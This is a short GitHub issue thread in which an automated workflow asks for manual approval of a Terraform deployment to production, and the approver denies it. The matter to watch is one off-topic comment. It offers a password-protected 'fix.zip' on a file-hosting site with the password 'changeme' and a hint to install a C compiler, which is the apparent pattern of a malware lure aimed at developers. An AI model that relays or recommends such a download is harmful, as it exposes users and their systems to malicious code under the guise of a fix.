### ISSUE TITLE
Manual approval required for workflow run 11088675168: Deploying  to prod

### ISSUE THREAD

**Issue by yahyagulshan** [expertscloud/terraform-control-tower#5]
Review the terraform plan, then approve or deny the deployment of  to prod.

Workflow is pending manual review.
URL: https://api.github.com/expertscloud/terraform-control-tower/actions/runs/11088675168

Required approvers: [abaidgulshan]

Respond "approved", "approve", "lgtm", "yes" to continue workflow or "denied", "deny", "no" to cancel.

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme

you may need to install the c compiler

**Comment by abaidgulshan** [comment]
no

**Comment by yahyagulshan** [comment]
Request denied. Closing issue and failing workflow.
